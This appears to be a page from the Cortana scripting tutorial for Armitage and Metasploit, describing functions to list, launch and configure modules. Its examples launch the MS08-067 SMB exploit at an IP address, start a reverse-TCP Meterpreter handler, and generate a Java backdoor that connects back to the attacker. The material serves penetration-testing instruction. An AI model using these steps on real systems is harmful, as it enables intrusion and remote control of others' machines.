Cortana Tutorial - Armitage
Cortana Tutorial - Armitage
Cortana Tutorial - Armitage
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
The &modules function returns an array of modules of a particular type. This function also<br />
filters the list using a wildcard expression if you ask it to.<br />
Use the &options function to find the options associated with a particular module. The<br />
&info function provides extra information about a module.<br />
To launch a module (any module), use the &launch function. The following code launches<br />
the ms08_067_netapi module:<br />
launch("exploit", "windows/smb/ms08_067_netapi", %(<br />
RHOST => "192.168.95.166",<br />
PAYLOAD => "windows/meterpreter/bind_tcp"));<br />
The &launch function doesn't provide much help though. It launches a module of a<br />
particular type with the options you give it.<br />
Use &exploit to quickly launch an exploit module. This function will set a payload for you<br />
and take care of all the details. While there are several optional arguments, you may use<br />
&exploit with just two arguments to launch a fully configured exploit at a host.<br />
exploit("windows/smb/ms08_067_netapi", "192.168.95.166");<br />
Use the &handler function to quickly start a multi/handler for a payload. A multi/handler<br />
waits for a payload to connect to it. The following example starts a multi/handler for<br />
java/meterpreter/reverse_tcp on port 81.<br />
handler("java/meterpreter/reverse_tcp", 81);<br />
Use the &generate function to generate a payload suitable for saving to a file. This example<br />
generates a Java meterpreter file and saves it to backdoor.jar. This file connects to the<br />
multi/handler we created in the previous example.<br />
$backdoor = generate("java/meterpreter/reverse_tcp", lhost(), 81,<br />
%(), "raw");<br />
$handle = openf(">backdoor.jar");<br />
writeb($handle, $backdoor);<br />
closef($handle);<br />
The &lhost function returns the IP address of the system hosting the Metasploit<br />
Framework.<br />
Data Management<br />
One of the gaps in the Metasploit API is a lack of documented methods to communicate<br />
with the database. Metasploit stores hosts, services, credentials, and a wealth of other data<br />
points in a database. <strong>Cortana</strong> transparently connects to the Metasploit database and<br />
regularly polls the known sessions, routes, hosts, services, loots, and credentials.<br />
14